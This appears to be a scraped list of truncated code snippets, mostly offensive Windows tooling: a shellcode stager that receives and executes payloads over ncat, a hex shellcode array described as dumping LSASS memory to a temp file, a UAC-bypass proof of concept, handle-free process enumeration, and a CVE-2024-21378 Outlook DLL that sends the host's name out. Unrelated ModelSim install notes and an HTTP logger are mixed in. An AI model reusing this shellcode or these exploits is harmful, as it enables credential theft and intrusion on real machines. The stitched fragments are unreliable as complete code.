gavz

// simple stager, by aaaddress1@chroot.org
// using ncat to send shellcode payload, recv & execute.
#include <WS2tcpip.h>
#include <stdio.h>
#include <shlobj.h>
#include <Windows.h>
#include <shlwapi.h>
#include <winsock2.h>
#pragma warning(disable:4996)
#pragma comment(lib, "ws2_32.lib")

gavz

// ETW CLR Tracker, by aaaddress1@chroot.org
// rewrite from post "Hiding your .NET - ETW"
// URL: https://blog.xpnsec.com/hiding-your-dotnet-etw/
#define AssemblyDCStart_V1 155
#define AssemblyLoad_V1 154
#define MethodLoadVerbose_V1 143

#include <windows.h>
#include <stdio.h>
#include <wbemidl.h>

gavz

// sprintf(commandLine, L"%i C:\\Windows\\Temp\\DumpLsass.log full", GetCurrentProcessId); MiniDumpW(0, 0, commandLine);
char shellcode_selfDumpToTmp[] = "\xe9\x0c\x02\x00\x00\x90\x48\x89\xc8\x48\x8d\x49\x02\x66\x83\x38\x00\xb8\x00\x00\x00\x00\x74\x28\x0f\x1f\x84\x00\x00\x00\x00\x00\x44\x0f\xb7\x01\x48\x83\xc1\x02\x44\x89\xc2\x83\xca\x20\x0f\xb7\xd2\x01\xd0\xc1\xc8\x08\x66\x45\x85\xc0\x75\xe4\xc3\x0f\x1f\x00\xc3\x48\x89\xc8\x48\x8d\x49\x01\x80\x38\x00\xb8\x00\x00\x00\x00\x74\x26\x66\x0f\x1f\x44\x00\x00\x44\x0f\xb6\x01\x48\x83\xc1\x01\x44\x89\xc2\x83\xca\x20\x0f\xbe\xd2\x01\xd0\xc1\xc8\x08\x45\x84\xc0\x75\xe5\xc3\x0f\x1f\x40\x00\xc3\x65\x48\x8b\x04\x25\x60\x00\x00\x00\x48\x8b\x40\x18\x4c\x8b\x48\x20\x4c\x8d\x58\x20\x4d\x39\xcb\x74\x34\x48\x83\xec\x28\x41\x89\xca\xeb\x0c\x0f\x1f\x40\x00\x4d\x8b\x09\x4d\x39\xcb\x74\x18\x49\x8b\x49\x50\xe8\x55\xff\xff\xff\x44\x39\xd0\x75\xea\x49\x8b\x41\x20\x48\x83\xc4\x28\xc3\x90\x31\xc0\x48\x83\xc4\x28\xc3\x31\xc0\xc3\x57\x56\x53\x48\x83\xec\x20\x48\x63\x41\x3c\x8b\xb4\x01\x88\

gavz

//
// SITCON 2020 PoC for Windows 7 x86
// Author: aaaddress1@chroot.org
// cite: github.com/liuxigu/bypassuac/blob/master/bypassuac/bypassuac.cpp
//
#include <Shobjidl.h>
#include "windows.h"
#include "winternl.h"
#include <iostream>
using namespace std;

gavz

/*
* 
* List process information on windows without opening any handles, including process architecture and username
* 
*/

#include <Windows.h>
#include <stdio.h>
#include <math.h>

gavz

// Demonstrates use of NtQuerySystemInformation and SystemProcessIdInformation to get the image name of a process without opening a process handle
// Author: TheWover
//

#include <iostream>
#include <string>
#include "ntdefs.h"

typedef struct SYSTEM_PROCESS_ID_INFORMATION
{

gavz

// Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
// Author: TheWover
//

#include <iostream>
#include <string>
#include "ntdefs.h"

bool demoSystemProcessInformation(bool full)
{

gavz

#!/usr/bin/env python3
"""
License: MIT License
Copyright (c) 2023 Miel Donkers

Very simple HTTP server in python for logging requests
Usage::
    ./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer

gavz

ModelSim Installation on Ubuntu

Installation requirements

The free version of Modelsim is a 32-bit binary and therefore requires certain 32-bit libraries in order to work correctly. For Ubunutu, install the following packages

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 lib32ncurses6 libxft2 libxft2:i386 libxext6 libxext6:i386 

gavz

/**
 *    This DLL is designed for use in conjunction with the Ruler tool for
 *    security testing related to the CVE-2024-21378 vulnerability, 
 *    specifically targeting MS Outlook.
 * 
 *    It can be used with the following command line syntax:
 *      ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 *    Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 *    After being loaded into MS Outlook, it sends the PC's hostname and